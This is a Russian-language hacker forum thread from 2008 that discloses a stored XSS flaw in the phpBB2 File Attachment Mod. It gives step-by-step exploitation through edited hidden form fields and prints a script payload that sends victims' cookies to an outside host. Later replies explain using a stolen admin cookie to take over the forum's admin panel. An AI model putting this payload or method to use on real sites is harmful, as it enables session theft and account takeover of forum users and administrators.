Форумы !!! phpBB2 новая активная XSS !!!

Discussion in 'Уязвимости CMS/форумов' started by KIR@PRO, 16 Apr 2008.

  1. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    !!! phpBB2 mod File Attachment Mode новая активная XSS !!!

    Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5

    привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))

    исходя из сообщения Basurman :

    рассмотренная мной версия >= 2.0.22

    уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))

    Уязвимые поля:
    1. attachment_list[]
    2. filename_list[]
    3. filesize_list[]
    4. filetime_list[]
    5. attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)

    суть уязвимости:
    при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
    не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
    отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
    type у указанных выше полей на text, и изменяем и изменяем action формы на полный
    путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
    видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
    зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie :))

    все тоже самое с перечисленными выше скриптами...

    на 3-й ветке пробовал там уже нету..... :cool:

    Video: http://www.youtube.com/watch?v=V3l9olLFLbw :D +

    если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ;)


    ___________________________________
    [​IMG]
     
    _________________________
    #1 KIR@PRO, 16 Apr 2008
    Last edited: 30 Mar 2013
    7 people like this.
  2. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?
     
    #2 Basurman, 16 Apr 2008
  3. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо....

    ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код....
     
    _________________________
    #3 KIR@PRO, 16 Apr 2008
    Last edited: 16 Apr 2008
  4. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Это вопрос был :)

    И еще:
    В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом.
    Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5
     
    #4 Basurman, 16 Apr 2008
    Last edited: 16 Apr 2008
  5. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать...

    а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник)))))
     
    _________________________
    #5 KIR@PRO, 16 Apr 2008
  6. hackconnect

    hackconnect Elder - Старейшина

    Joined:
    8 Mar 2007
    Messages:
    49
    Likes Received:
    5
    Reputations:
    0
    ни о чем не говорит? :D
     
    #6 hackconnect, 16 Apr 2008
    Last edited: 16 Apr 2008
  7. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    на 2.4.5 не пашет
    код посмотрю еще...

    http://www.securitylab.ru/vulnerability/273545.php
     
    #7 Basurman, 16 Apr 2008
    Last edited: 16 Apr 2008
    1 person likes this.
  8. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать))))



    bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел....
     
    _________________________
    #8 KIR@PRO, 17 Apr 2008
    1 person likes this.
  9. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Видео к уязвимости: http://video.antichat.ru/file264.html
     
    #9 ShadOS, 22 Apr 2008
  10. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ShadOS, http://www.securitylab.ru/vulnerability/273545.php
     
    #10 GreenBear, 22 Apr 2008
  11. BioReactor

    BioReactor New Member

    Joined:
    27 Feb 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    А как через эту уязвимость можно залезть или убить бд???
     
    #11 BioReactor, 19 May 2008
  12. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    ты можешь узнать Cookie админа и там уже через админку......
     
    _________________________
    #12 KIR@PRO, 19 May 2008
  13. BioReactor

    BioReactor New Member

    Joined:
    27 Feb 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    А этот скрипт работает через сервера или через клиента, тоесть когда заходят на заражённую страницу, то инфа посылается через сервер где находится страница или через клиента, котрый зашёл на страницу???
     
    #13 BioReactor, 19 May 2008
  14. bottanikk

    bottanikk New Member

    Joined:
    21 Feb 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    на большинстве форумов нет опции приложения файлов. Это значит она отключена или просто не та версия форума?
     
    #14 bottanikk, 19 May 2008
  15. BioReactor

    BioReactor New Member

    Joined:
    27 Feb 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Возможно и отключена, а возможно на форуме вообще не установлен модуль (File Attachment Mode)
     
    #15 BioReactor, 20 May 2008
  16. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    BioReactor со стороны клиента
     
    _________________________
    #16 KIR@PRO, 25 May 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.